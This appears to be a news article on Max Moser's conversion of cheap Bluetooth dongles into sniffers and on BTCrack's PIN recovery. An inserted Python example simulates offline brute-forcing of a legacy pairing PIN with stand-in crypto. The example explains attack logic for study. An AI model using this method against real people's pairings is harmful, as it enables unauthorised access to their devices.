Bluetooth sniffing for all
Security specialist Max Moser, whose credits include developing the BackTrack security distribution, claims to have found a way to turn a commercially available Bluetooth dongle into a Bluetooth sniffer. This would make it possible to read all packets from Bluetooth devices within range, not just those addressed to your own device. As with WLAN, this would have serious consequences for Bluetooth security: the freely available tool BTCrack can recover the PIN and the link key from packets captured during the pairing process, which would give an attacker access to the paired device as well.
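The offline PIN attack that BTCrack automates, as an added worked example that is not from the article or from BTCrack itself. It models the legacy (Bluetooth 2.0 and earlier) PIN pairing flow: the initialisation key is derived from the PIN, each side sends its random contribution XORed with that key, the combination key becomes the link key, and an authentication response SRES is sent in the clear. The real E22, E21 and E1 functions are SAFER+ based; here they are replaced by HMAC-SHA256 stand-ins (an assumption, not the Bluetooth specification) so the block runs without a SAFER+ implementation. The sample addresses and nonces are constructed, not captured traffic. What it shows is why one sniffed pairing is enough: every input except the PIN is on the air, and SRES gives the attacker an offline check for each PIN guess.

```python
import hashlib
import hmac
import itertools

# Offline PIN recovery against Bluetooth legacy PIN pairing.
# ASSUMPTION: E22/E21/E1 are SAFER+ based in real Bluetooth; they are replaced
# here by HMAC-SHA256 stand-ins so the example runs offline. The message flow
# and the verifier logic are what the example demonstrates, not the cipher.

def _prf(label: bytes, *parts: bytes) -> bytes:
    """Stand-in keyed function used in place of E22/E21/E1 (not the real cipher)."""
    return hmac.new(label, b"".join(parts), hashlib.sha256).digest()[:16]

def e22(pin: bytes, bd_addr: bytes, in_rand: bytes) -> bytes:
    """Initialisation key K_init from the PIN, one device address and IN_RAND."""
    return _prf(b"E22", pin, bd_addr, in_rand)

def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """One device's contribution to the combination (link) key."""
    return _prf(b"E21", lk_rand, bd_addr)

def e1(link_key: bytes, au_rand: bytes, bd_addr: bytes) -> bytes:
    """Authentication response SRES (32 bits, as in real Bluetooth)."""
    return _prf(b"E1", link_key, au_rand, bd_addr)[:4]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def legacy_pairing(pin, addr_a, addr_b, in_rand, lk_rand_a, lk_rand_b, au_rand):
    """Simulate the over-the-air exchange. Returns what a sniffer sees plus the secret link key."""
    k_init = e22(pin, addr_a, in_rand)      # both sides derive K_init from the shared PIN
    comb_a = xor(lk_rand_a, k_init)         # A -> B: LK_RAND_A masked with K_init
    comb_b = xor(lk_rand_b, k_init)         # B -> A: LK_RAND_B masked with K_init
    link_key = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
    sres = e1(link_key, au_rand, addr_b)    # B answers A's challenge AU_RAND
    sniffed = {"addr_a": addr_a, "addr_b": addr_b, "in_rand": in_rand,
               "comb_a": comb_a, "comb_b": comb_b, "au_rand": au_rand, "sres": sres}
    return sniffed, link_key

def crack_pin(sniffed, max_digits=4):
    """Offline search over numeric PINs; the captured SRES is the verification oracle."""
    for n in range(1, max_digits + 1):
        for digits in itertools.product("0123456789", repeat=n):
            pin = "".join(digits).encode()
            k_init = e22(pin, sniffed["addr_a"], sniffed["in_rand"])
            lk_rand_a = xor(sniffed["comb_a"], k_init)      # unmask both contributions
            lk_rand_b = xor(sniffed["comb_b"], k_init)
            link_key = xor(e21(lk_rand_a, sniffed["addr_a"]),
                           e21(lk_rand_b, sniffed["addr_b"]))
            if e1(link_key, sniffed["au_rand"], sniffed["addr_b"]) == sniffed["sres"]:
                return pin.decode(), link_key
    return None, None

# Constructed sample inputs (not captured traffic): addresses and nonces are arbitrary.
SAMPLE_PIN = b"2764"
SAMPLE = dict(
    addr_a=bytes.fromhex("001122334455"),
    addr_b=bytes.fromhex("66778899aabb"),
    in_rand=bytes(range(16)),
    lk_rand_a=bytes(range(16, 32)),
    lk_rand_b=bytes(range(32, 48)),
    au_rand=bytes(range(48, 64)),
)

def demo():
    """Pair with the sample PIN, then recover it from the sniffed values alone."""
    sniffed, real_key = legacy_pairing(SAMPLE_PIN, **SAMPLE)
    pin, key = crack_pin(sniffed)
    return pin, key == real_key

if __name__ == "__main__":
    print(demo())
```

The search cost is what makes the attack practical: a four-digit PIN means at most about 11,000 candidate derivations, each a handful of cheap function evaluations, so the whole recovery takes well under a second once the pairing has been captured. Nothing in the protocol rate-limits the attacker, because every check is performed against the recorded transcript rather than against the device.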
Until now, such an attack has required a Bluetooth protocol analyser costing several thousand euros. WLAN was likewise considered relatively secure until cards appeared whose firmware supported monitor mode and could pass every received packet to tools such as Airsnort and Kismet.
A comparable mode, RAW mode, is indeed supported by some more expensive Bluetooth dongles, and its absence on cheap dongles is clearly a limitation imposed by the firmware rather than by the hardware. While analysing commercial Bluetooth sniffer packages, Moser noticed that their drivers expect sticks built around a chip from Cambridge Silicon Radio (CSR). One package also shipped firmware with which Moser was able to enable RAW mode on an ordinary stick. Using demo versions of the commercial sniffing software, he was then able to read Bluetooth traffic. The only thing still missing for widespread use of Bluetooth sniffers is a free Linux sniffer.
It will be interesting to see whether others manage to turn low-cost Bluetooth dongles into sniffers and what effect this has on Bluetooth security. In the medium term, Bluetooth can be expected to become increasingly the hacker's technology of choice. Whether this year will see the first Bluedriving events, the counterpart of the wardriving events already common for WLAN, remains to be seen.
- Busting the Bluetooth Myth, report from Max Moser
- 23C3 - new hacker tools for Bluetooth, report on heise Security